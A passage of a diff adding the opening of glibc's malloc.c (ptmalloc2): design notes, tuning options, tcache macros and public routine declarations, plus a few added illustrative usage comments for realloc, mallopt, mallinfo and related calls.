+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <https://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  By default you may already be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  Linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+                          8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
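+
+/*
+   Worked example for the macros above (not part of glibc), assuming the
+   usual 64-bit values SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 32:
+
+     request 24 -> request2size -> chunk size 32 (0x20)
+                   csize2tidx (32) = (32 - 32 + 15) / 16 = 0  -> tcache bin 0
+     request 25 -> chunk size 48 (0x30)
+                   csize2tidx (48) = (48 - 32 + 15) / 16 = 1  -> tcache bin 1
+     request 56 -> chunk size 64 (0x40)
+                   csize2tidx (64) = (64 - 32 + 15) / 16 = 2  -> tcache bin 2
+
+   which matches the "idx 0 bytes 0..24, idx 1 bytes 25..40, ..." table
+   above.  */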
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
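+
+/*
+  Illustrative sketch (example only) of the usual "don't lose p on
+  failure" pattern implied by the note above that p is NOT freed when
+  realloc fails:
+
+    char *tmp = realloc (p, new_size);
+    if (tmp == NULL)
+      free (p);                 // p is still valid and must be released
+    else
+      p = tmp;
+*/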
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
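+
+/*
+  Illustrative use of mallopt (example only).  M_MXFAST is the standard
+  parameter described above; a value of 0 disables fastbins entirely:
+
+    #include <malloc.h>
+    #include <stdio.h>
+
+    if (mallopt (M_MXFAST, 0) != 1)
+      fprintf (stderr, "mallopt rejected the value\n");
+*/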
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
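+
+/*
+  Illustrative sketch (example only) of reading a few of the fields
+  listed above:
+
+    #include <malloc.h>
+    #include <stdio.h>
+
+    struct mallinfo mi = mallinfo ();
+    printf ("in use: %d bytes, free: %d bytes, mmapped: %d bytes\n",
+            mi.uordblks, mi.fordblks, mi.hblkhd);
+*/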
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
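+
+/*
+  Illustrative sketch (example only): after releasing a large working
+  set, ask the allocator to return trailing free memory to the system,
+  keeping 64K of slack for future allocations.
+
+    #include <malloc.h>
+    #include <stdio.h>
+
+    if (malloc_trim (64 * 1024))
+      puts ("some memory was returned to the system");
+*/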
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
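+
+/*
+  Illustrative sketch of the POSIX interface (example only): the
+  alignment must be a power of two and a multiple of sizeof (void *),
+  and errors are returned as the result rather than through errno.
+
+    #include <stdlib.h>
+
+    void *p;
+    int err = posix_memalign (&p, 64, 1024);   // 64-byte aligned kilobyte
+    if (err == 0)
+      free (p);
+*/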
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
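+
+/* Illustrative sketch (example only): per the note above, trimming can
+   be disabled from a program by setting the threshold to
+   (unsigned long)(-1), e.g.
+
+     mallopt (M_TRIM_THRESHOLD, -1);
+
+   while a very small threshold value makes free() trim more
+   aggressively.  */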
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
